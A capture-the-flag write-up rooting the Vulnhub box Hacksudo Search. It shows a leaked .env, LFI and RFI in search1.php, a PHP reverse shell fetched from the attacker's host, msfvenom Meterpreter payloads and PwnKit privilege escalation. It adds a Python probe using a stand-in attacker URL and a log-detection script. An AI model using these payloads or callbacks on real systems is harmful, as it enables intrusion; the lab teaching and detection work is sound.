Hacksudo Search

Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:f5:05:04      1      60  PCS Systemtechnik GmbH
 192.168.56.162  08:00:27:b8:ce:1e      1      60  PCS Systemtechnik GmbH
netdiscover on Kali Linux (ARP sweep of the host-only network) identifies the target as 192.168.56.162; 192.168.56.1 is the host adapter and 192.168.56.100 the VirtualBox DHCP server.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 21:30 EDT
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
|   256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_  256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B8:CE:1E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds
The full-port scan shows two open TCP ports: 22 (OpenSSH 7.9p1 on Debian 10) and 80 (Apache 2.4.38). Everything else is closed, so the web application is the only realistic way in.
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/robots.txt
/* find me * im number 1 search engine . just joking :) www.hacksudo.com

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ nikto -h http://192.168.56.162
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.162
+ Target Hostname:    192.168.56.162
+ Target Port:        80
+ Start Time:         2023-04-24 22:26:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-04-24 22:27:52 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto finds /account/ with directory indexing enabled. The listing contains many files, but every one of them returns an empty body, so there is nothing to use there.

Nikto also reports /.env, which is far more interesting:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/.env
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!
The file exposes the MySQL credentials hiraman / MyD4dSuperH3r0! (the APP_key is only a base64-encoded "hacksudo help you to learn CTF, contact us www.hacksudo.com/contact" message, not a real secret). MySQL is bound to 127.0.0.1 and hiraman is not a local system account, so the pair does not get us an SSH login as-is. Keep the password anyway: passwords found in a .env are frequently reused by the local users, and worth trying against each of them once the account names are known. From the defensive side, a .env should never sit under the DocumentRoot, and Apache should refuse dotfiles outright (a <FilesMatch "^\."> block with Require all denied).
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ ssh hiraman@192.168.56.162
The authenticity of host '192.168.56.162 (192.168.56.162)' can't be established.
ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.162' (ED25519) to the list of known hosts.
hiraman@192.168.56.162's password: 
Permission denied, please try again.
hiraman@192.168.56.162's password: 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.162
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,txt,bak,js,sh
[+] Timeout:                 10s
===============================================================
2023/04/24 22:31:27 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.162/images/]
/index.php            (Status: 200) [Size: 715]
/search.php           (Status: 200) [Size: 165]
/submit.php           (Status: 200) [Size: 165]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.162/assets/]
/account              (Status: 301) [Size: 318] [--> http://192.168.56.162/account/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.162/javascript/]
/robots.txt           (Status: 200) [Size: 75]
/LICENSE              (Status: 200) [Size: 1074]
/search1.php          (Status: 200) [Size: 2918]
Gobuster turns up /search1.php. Its Contact section carries a hint from the box author that a GET parameter has to be fuzzed. So we fuzz parameter names with wfuzz, using a directory traversal to /etc/passwd as the value: a response is only interesting if the page changes, so --hw 288 hides every response with the baseline word count (288) and lets through only a parameter name that actually got the file included.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ wfuzz -c -u 'http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001129:   200        143 L    260 W      3797 Ch     "me"
The parameter name is me (in hindsight, the "find me" in robots.txt was pointing at it). Requesting /etc/passwd through it confirms a local file inclusion:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/search1.php?me=../../../../../../etc/passwd
Home About Contact HackSudo Search box
JumpStation The web crawler with Google
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
Visit --> www.hacksudo.com
Four accounts have a real login shell: hacksudo, monali, john and search. Next, check whether any of them has an SSH private key readable through the LFI:
http://192.168.56.162/search1.php?me=../../../../../../home/search/.ssh/id_rsa
The same request against the other ordinary users' home directories returns nothing either, so no private key can be read this way. An empty response does not prove the keys are absent, though: PHP runs as www-data, and, as the directory listing later in this write-up shows, the home directories are mode 750 and owned by their users, so www-data cannot read inside them at all.
Next, check for remote file inclusion by pointing the same parameter at a file served from the attacking machine (192.168.56.230):
http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/test.txt
The contents of test.txt come back in the page, so search1.php includes remote URLs as well: the target is vulnerable to RFI, which means PHP's allow_url_include is enabled (it is Off by default). Prepare a PHP reverse shell as shell.php on Kali and serve it with Python's http.server module on port 8000. Serve it from a plain file server like this, not from a PHP-enabled web server, which would execute the file on the attacker's side instead of delivering its source to the target. Start a netcat listener for the shell's callback port, then request:
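The parameter discovery, LFI confirmation, enumeration of login users from /etc/passwd and the RFI probe above, pulled together as an added Python example; this is not code from the write-up or from the Hacksudo box. The transport is injected as a callable, so the logic is exercised offline against fake_target, a constructed stand-in for search1.php that assumes the me parameter goes straight into include(). The candidate parameter names, the marker file URL (attacker.invalid) and the abbreviated passwd content are assumptions; pass http_fetch instead of fake_target to run it against a live host in the lab.

```python
"""Probe a suspected PHP include() sink: find the parameter, confirm LFI,
list login users from /etc/passwd, then test remote inclusion.
Transport is injected (url -> body) so the logic runs offline against the
constructed `fake_target` below; use `http_fetch` for a live host."""
from __future__ import annotations

import re
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

Fetch = Callable[[str], str]

# Same traversal the write-up uses; the depth is generous on purpose, since
# include() collapses surplus "../" at "/" and the document root is unknown.
TRAVERSAL = "../../../../../../etc/passwd"
PASSWD_LINE = re.compile(r"^([a-z_][a-z0-9_-]*):[^:]*:\d+:\d+:[^:]*:[^:]*:(\S+)$", re.M)
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def http_fetch(url: str, timeout: float = 5.0) -> str:
    """Live transport: plain GET, lenient decode (lab use only)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def discover_param(base: str, names: Iterable[str], fetch: Fetch) -> list[str]:
    """Replay wfuzz's --hw filter: the word count of a request with a junk
    parameter name is the baseline; a name whose traversal response has a
    different word count made the server include something."""
    value = urllib.parse.quote(TRAVERSAL)
    baseline = len(fetch(f"{base}?zzznotaparam={value}").split())
    return [n for n in names if len(fetch(f"{base}?{n}={value}").split()) != baseline]


def confirm_lfi(base: str, param: str, fetch: Fetch) -> Optional[str]:
    """Return the body only if it really carries the root line of /etc/passwd."""
    body = fetch(f"{base}?{param}={urllib.parse.quote(TRAVERSAL)}")
    return body if re.search(r"root:[^:]*:0:0:", body) else None


def interactive_users(passwd_text: str) -> list[str]:
    """Accounts with a real login shell: the SSH / password-reuse candidates."""
    return [user for user, shell in PASSWD_LINE.findall(passwd_text)
            if shell not in NON_LOGIN_SHELLS]


def confirm_rfi(base: str, param: str, marker_url: str, marker: str, fetch: Fetch) -> bool:
    """Include a file we host; our marker in the reply means allow_url_include
    is on and the server fetched (and evaluated) a remote file."""
    body = fetch(f"{base}?{param}={urllib.parse.quote(marker_url, safe='')}")
    return marker in body


# ---- constructed offline stand-in for search1.php (assumption, not the box) ----
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
"""
PAGE = "Home About Contact HackSudo Search box JumpStation The web crawler with Google\n"
MARKER_URL = "http://attacker.invalid:8000/marker.txt"  # assumed attacker file server
MARKER = "RFI-MARKER-7f3a"


def fake_target(url: str) -> str:
    """Behaves like `include($_GET['me'])`: local path or remote URL get echoed."""
    me = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query).get("me", [""])[0]
    if me.endswith("/etc/passwd"):
        return PAGE + SAMPLE_PASSWD
    if me == MARKER_URL:
        return PAGE + MARKER + "\n"
    return PAGE


def run(base: str, fetch: Fetch = fake_target) -> dict:
    found = discover_param(base, ["file", "page", "q", "search", "me", "path"], fetch)
    if not found:
        return {"param": None}
    param = found[0]
    passwd = confirm_lfi(base, param, fetch)
    return {
        "param": param,
        "lfi": passwd is not None,
        "users": interactive_users(passwd or ""),
        "rfi": confirm_rfi(base, param, MARKER_URL, MARKER, fetch),
    }


if __name__ == "__main__":
    print(run("http://192.168.56.162/search1.php"))
```

The baseline trick is the same one --hw 288 performs: compare against a response for a parameter the script certainly does not use, rather than against a hard-coded count, so the check survives a page whose length differs from this box's.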
Request the following URL so that the target fetches and executes shell.php:
http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/shell.php
The reverse shell connects back to the listener on Kali. The banner lines (uname -a, uptime/w, id) are what pentestmonkey's php-reverse-shell prints on connect, so that is presumably the shell.php used. The dumb shell is then upgraded to a pty with Python:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.162] 55864
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
 22:00:50 up 40 min,  0 users,  load average: 0.01, 1.18, 1.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$ cd /home
cd /home
www-data@HacksudoSearch:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x  6 root     root     4.0K Apr 15  2021 .
drwxr-xr-x 18 root     root     4.0K Apr 11  2021 ..
drwxr-x---  6 hacksudo hacksudo 4.0K Apr 15  2021 hacksudo
drwxr-x---  2 john     john     4.0K Apr 13  2021 john
drwxr-x---  2 monali   monali   4.0K Apr 13  2021 monali
drwxr-x---  2 search   search   4.0K Apr 15  2021 search

All four home directories are mode 750 and owned by their users, so www-data cannot enter them; this is also why the ~/.ssh/id_rsa probes through the LFI came back empty.
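From the defender's side, the requests made in this section leave a recognisable trail in Apache's access log. The following added Python example (not part of the write-up) scans combined-format log lines for directory traversal, sensitive absolute paths (including the log files an attacker targets for log poisoning, the alternative route the author's notes.txt mentions), remote and PHP-wrapper URLs in query parameters, and dotfile probes such as /.env. The log lines are constructed to mirror the requests on this page, not captured from the box; the log format and the rule lists are assumptions a deployment would tune.

```python
"""Flag file-inclusion abuse in Apache combined-format access logs.
SAMPLE_LOG is constructed to mirror this write-up's requests."""
from __future__ import annotations

import re
import urllib.parse
from dataclasses import dataclass

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# include() will open these when allow_url_include (or the wrapper) is enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:", "expect://")
# Usual LFI targets; /var/log/ covers log poisoning (e.g. auth.log after a PHP
# payload was planted in a failed SSH username).
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/var/log/", "/proc/self/", "/.ssh/")
DOTFILES = {"/.env", "/.git/config", "/.htpasswd"}


@dataclass
class Finding:
    line: int
    ip: str
    rule: str
    value: str


def decode(value: str) -> str:
    """Percent-decode until stable so %252e%252e (double encoding) is caught."""
    for _ in range(3):
        nxt = urllib.parse.unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value


def inspect_target(target: str) -> list[tuple[str, str]]:
    """Apply the rules to one request target; returns (rule, evidence) pairs."""
    path, _, query = target.partition("?")
    hits: list[tuple[str, str]] = []
    if decode(path) in DOTFILES:
        hits.append(("dotfile-probe", path))
    for name, values in urllib.parse.parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            v = decode(raw)          # parse_qs decoded once; finish the job
            low = v.lower()
            if "../" in low.replace("\\", "/"):
                hits.append(("traversal", f"{name}={v}"))
            if any(s in low for s in SENSITIVE):
                hits.append(("sensitive-path", f"{name}={v}"))
            if low.startswith(REMOTE_SCHEMES):
                hits.append(("remote-include", f"{name}={v}"))
    return hits


def scan(log_text: str) -> list[Finding]:
    findings: list[Finding] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format (or a torn line): skip, don't guess
        findings.extend(Finding(n, m["ip"], rule, value)
                        for rule, value in inspect_target(m["target"]))
    return findings


# Constructed sample: one benign request, then the probes seen in this write-up.
SAMPLE_LOG = """\
192.168.56.1 - - [24/Apr/2023:22:30:01 -0400] "GET /search1.php?me=about HTTP/1.1" 200 2918 "-" "Mozilla/5.0"
192.168.56.230 - - [24/Apr/2023:22:31:27 -0400] "GET /.env HTTP/1.1" 200 300 "-" "gobuster/3.5"
192.168.56.230 - - [24/Apr/2023:22:33:40 -0400] "GET /search1.php?me=../../../../../../etc/passwd HTTP/1.1" 200 3797 "-" "curl/7.88.1"
192.168.56.230 - - [24/Apr/2023:22:34:02 -0400] "GET /search1.php?me=..%252F..%252Fvar%252Flog%252Fauth.log HTTP/1.1" 200 3797 "-" "curl/7.88.1"
192.168.56.230 - - [24/Apr/2023:22:45:02 -0400] "GET /search1.php?me=http://192.168.56.230:8000/shell.php HTTP/1.1" 200 165 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line} {f.ip} {f.rule}: {f.value}")
```

A 200 with a body far larger than the page's normal size (3797 bytes against 2918 for a valid search) is the cheapest corroborating signal for a successful inclusion; the rules above fire on the request alone so they also catch the failed attempts that precede it.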
Privilege escalation
Generate a Linux Meterpreter payload with msfvenom, upload it to /tmp on the target (the write-up does not show the transfer; fetching it with wget or curl from the reverse shell, via the http.server already running on Kali, is the usual way), make it executable and run it. The handler's payload must be set to exactly the one msfvenom was given (staged linux/x86/meterpreter/reverse_tcp), otherwise the stage is never sent:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.230:6666 
[*] Sending stage (989032 bytes) to 192.168.56.162
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.162:33994) at 2023-04-24 22:51:21 -0400

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.162 - Collecting local exploits for x86/linux...
[*] 192.168.56.162 - 167 exploit checks are being tried...
[+] 192.168.56.162 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.162 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.162 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.162 - Valid modules for session 1:
============================

 #   Name                                                 Potentially Vulnerable?  Check Result
 -   ----                                                 -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec  Yes                      The target is vulnerable.
 2   exploit/linux/local/pkexec                           Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/su_login                         Yes                      The target appears to be vulnerable.
The suggester's only result with a positive check is CVE-2021-4034 (PwnKit, the argv[0]/environment handling bug in SUID pkexec), so that module is run against session 1. Its default payload is the x64 Meterpreter, which matches the x86_64 kernel seen earlier; it needs its own LPORT because 6666 is still held by the first handler. Note that this is an unintended route: the author's notes.txt (dumped below) describes the intended chain, reusing the .env password over SSH as hacksudo and then PATH-hijacking the SUID searchinstall binary.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.aqmsnondyug
[+] The target is vulnerable.
[*] Writing '/tmp/.esjvtiaf/vswplcef/vswplcef.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.esjvtiaf
[*] Sending stage (3020772 bytes) to 192.168.56.162
[+] Deleted /tmp/.esjvtiaf/vswplcef/vswplcef.so
[+] Deleted /tmp/.esjvtiaf/.qbbgfqf
[+] Deleted /tmp/.esjvtiaf
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.162:40940) at 2023-04-24 22:55:08 -0400

meterpreter > shell
Process 1145 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls
notes.txt
root.txt
cat notes.txt
[ASCII-art banner: hacksudo search]
+-------------------------------------------------------------------------+
hacksudo search Box created By vishal waghmare
https://instagram.com/realvilu
try hacksudo other box
1.hacksudo 1.1
2.hacksudo 2 
3.hacksudo 3
4.hacksudo aliens
+----------------------------------+
this box name is hacksudo search. it's my pleasure to create such box .
+-----------------------------------+
if any query or want any kinda support you can contact us
email: info@hacksudo.com visal@hacksudo.com
web : www.hacksudo.com 
+----------------------------+
hacksudo search vulnerability:
1. LFI ssh log poisioning / RFI on search1.php
2. after geting shell or you can do ls -la in /var/www/html in .env there is password hint
3. users are 3 to 4 so confused? do ssh one by one else do hydra with given password (MyD4dSuperH3r0!)
4. hacksudo ssh login done now do privileged escalation , there is searchinstall.c searchinstall file which one have SUID permision and by read searchinstall.c there you can read install command which is triggerd . 
so try path veriable and you will get root access 
+++------rooted------------+++
yes you roted box thats why you read this
btw create your writeup how you solve this box and send to me
i love to read your way how you solve this box
+++---------+++-----------+++
Signed out
#vishal waghmare
cat root.txt
[ASCII-art banner: hacksudo Search]
You Successfully Hackudo search box rooted!!!
flag={9fb4c0afce26929041427c935c6e0879}
STRIVE FOR PROGRESS,NOT FOR PERFECTION